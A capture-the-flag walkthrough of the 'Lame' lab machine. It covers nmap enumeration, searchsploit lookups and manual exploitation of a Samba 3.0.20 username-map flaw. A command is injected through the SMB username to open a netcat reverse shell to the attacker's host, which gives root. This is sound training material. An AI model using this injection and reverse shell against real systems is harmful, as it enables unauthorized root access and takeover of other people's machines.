search

Lame

hashtag
Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.3 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane mode, it is the fastest mode of the nmap time template.

  • -Pn assume the host is online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case the allports file.

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan those ports more in depth and save the result into a file:

nmap -sC -sV -p21,22,139,445,3632 10.10.10.3 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result into file, in this case the targeted file.

hashtag
Exploitation

As we can see, on port 21 there is an FTP service running with a suspicious version. Let's search for that version with searchsploit:

searchsploit vsftpd 2.3.4

We could see there is an exploit that we could use, let's try it. To copy that exploit script to the current folder, we just need to execute searchsploit with the -m option indicating the exploit path:

searchsploit -m unix/remote/49757.py

If we execute the exploit with the IP address of the targeted machine we will see that nothing happens.

python 49757.py 10.10.10.3

No worries, let's try to find other ways to gain access to the machine. If we look into the nmap scan, we could see that port 139 and 445 are open. These ports are usually used by the SMB service. Also, nmap reported the version of the SMB service, which is Samba smbd 3.0.20-Debian. Once again, let's try to find any exploit associated to that version with searchsploit.

searchsploit samba 3.0.20

It looks like there are some interesting exploits. Let's inspect the Metasploit one.

searchsploit -x unix/remote/16320.rb

If we take a look at the script, we can see that the only thing it does is login into the SMB server with the user /=nohup payload . Let's try to exploit this vulnerability manually.

First, we will need to try to list shares.

smbclient -L //10.10.10.3/ -N

  • -L get a list of shares available on the host.

  • -N makes use of a null session, don't ask for password.

We get this error:

circle-exclamation

If you ever get this error, try to add the following parameter to the command:

--option="client min protocol=NT1"

Let's run the final command in order to list shares:

smbclient -L //10.10.10.3/ -N --option="client min protocol=NT1"

We are able to lists shares successfully. It's time to get a shell. The idea is to get into the tmp share and login with the malicious user.

First of all, we have to set a netcat listener:

nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

We get into the tmp share and then we login with the user "/=`nohup nc -e /bin/bash 10.10.14.7 4444`" to get a reverse shell.

smbclient //10.10.10.3/tmp -N --option="client min protocol=NT1"

smb: > logon "/=`nohup nc -e /bin/bash 10.10.14.7 4444`"

If we enter a random password, we should be able to get a reverse shell in our netcat listener.

As we got the shell as the root user, all we have to do is reap the harvest and get the user and root flag.

Last updated

Was this helpful?